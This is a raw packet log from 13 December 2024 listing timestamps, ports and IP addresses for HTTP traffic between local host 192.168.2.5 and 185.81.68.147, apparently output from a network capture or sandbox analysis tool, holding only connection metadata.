Dec 13, 2024 01:37:31.070446014 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.070485115 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.070501089 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.078510046 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.078546047 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.078572035 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.078588963 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.087297916 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.087352037 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.087428093 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.095253944 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.095307112 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.095372915 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.103621960 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.103741884 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.103807926 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.111968040 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.112082958 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.112164974 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.120865107 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.121017933 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.121089935 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.129381895 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.129417896 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.129484892 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.137619972 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.137769938 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.137829065 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.144861937 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.145030975 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.145100117 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.152080059 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.152117014 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.152184010 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.247997046 CET	80	49754	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.248161077 CET	80	49754	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.248239040 CET	49754	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.249425888 CET	49754	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.257903099 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.258110046 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.258169889 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.260171890 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.260308981 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.260360956 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.264688969 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.266365051 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.266418934 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.266494036 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.266539097 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.270869017 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.270936012 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.270941973 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.270979881 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.275392056 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.275451899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.275516987 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.275563955 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.279906988 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.279973984 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.280026913 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.284434080 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.284493923 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.284538984 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.284553051 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.288872004 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.289006948 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.289076090 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.293395042 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.293450117 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.293519974 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.293565989 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.297882080 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.297982931 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.298038006 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.302354097 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.302467108 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.302520990 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.306889057 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.307003021 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.307033062 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.307077885 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.311395884 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.311480999 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.311495066 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.311531067 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.315855026 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.315907955 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.315967083 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.316060066 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.320322990 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.320465088 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.320511103 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.324843884 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.324934006 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.325011969 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.325058937 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.329294920 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.329355001 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.329406977 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.329544067 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.333802938 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.336157084 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.370357037 CET	49758	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.374191999 CET	80	49754	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.450289011 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.450345993 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.450402975 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.450449944 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.452059031 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.452110052 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.452174902 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.452223063 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.455609083 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.456800938 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.456940889 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.456994057 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.457027912 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.457077026 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.460457087 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.460511923 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.460576057 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.460623980 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.464006901 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.464061975 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.464061022 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.464104891 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.467602968 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.467654943 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.467701912 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.467880011 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.471115112 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.471282959 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.471338987 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.474670887 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.474776983 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.474839926 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.478251934 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.478323936 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.478326082 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.478364944 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.481801987 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.481894016 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.481947899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.485316992 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.485415936 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.485470057 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.485539913 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.488960981 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.489015102 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.489042997 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.489090919 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.490251064 CET	80	49758	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.490338087 CET	49758	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.490396023 CET	49758	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.492445946 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.492571115 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.492620945 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.495966911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.496062040 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.496093988 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.496139050 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.499561071 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.499634027 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.499682903 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.503066063 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.503101110 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.503119946 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.503170967 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.506654978 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.506732941 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.506783962 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.510195017 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.510229111 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.510245085 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.510294914 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.513752937 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.513844013 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.513874054 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.513921022 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.517292976 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.517427921 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.517445087 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.517468929 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.520879984 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.520931959 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.520951033 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.520991087 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.524395943 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.524446011 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.524496078 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.527966976 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.528018951 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.528088093 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.528132915 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.531549931 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.531599998 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.531653881 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.535036087 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.535146952 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.535176992 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.535192966 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.538584948 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.538695097 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.538758039 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.542217016 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.542280912 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.542289019 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.542329073 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.545716047 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.545768023 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.545886040 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.545933008 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.549264908 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.549314022 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.549364090 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.610102892 CET	80	49758	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.611481905 CET	49758	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.642740011 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.642910957 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.642942905 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.643086910 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.644259930 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.644318104 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.644437075 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.644490957 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.647355080 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.647408009 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.647409916 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.647454977 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.650348902 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.650403976 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.650473118 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.650520086 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.653310061 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.653362036 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.653425932 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.653471947 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.656295061 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.656341076 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.656347036 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.656404018 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.659197092 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.659246922 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.659308910 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.659359932 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.662022114 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.662072897 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.662136078 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.662180901 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.664763927 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.664865971 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.664871931 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.664921045 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.667486906 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.667536974 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.667537928 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.667583942 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.670188904 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.670237064 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.670279026 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.670325041 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.672827005 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.672877073 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.672945976 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.672991037 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.675436974 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.675532103 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.675565004 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.675611973 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.677956104 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.678078890 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.678128958 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.680556059 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.680609941 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.680610895 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.680654049 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.683085918 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.683134079 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.683136940 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.683176994 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.686539888 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.686575890 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.686593056 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.686616898 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.688620090 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.688652992 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.688669920 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.688698053 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.691392899 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.691427946 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.691445112 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.691474915 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.695398092 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.695431948 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.695497990 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.696880102 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.696913958 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.696968079 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.699419975 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.699454069 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.699471951 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.699498892 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.702598095 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.702630997 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.702682972 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.703939915 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.703974009 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.704021931 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.706177950 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.706286907 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.706343889 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.708888054 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.708921909 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.708980083 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.711388111 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.711421967 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.711452007 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.711483002 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.713787079 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.713967085 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.714031935 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.716814995 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.716849089 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.716908932 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.718928099 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.719027042 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.719057083 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.719099045 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.721610069 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.721645117 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.721698999 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.724078894 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.724112988 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.724164963 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.726942062 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.726975918 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.726996899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.727021933 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.729590893 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.729624033 CET	80	49753	185.81.68.147	192.168.2.5
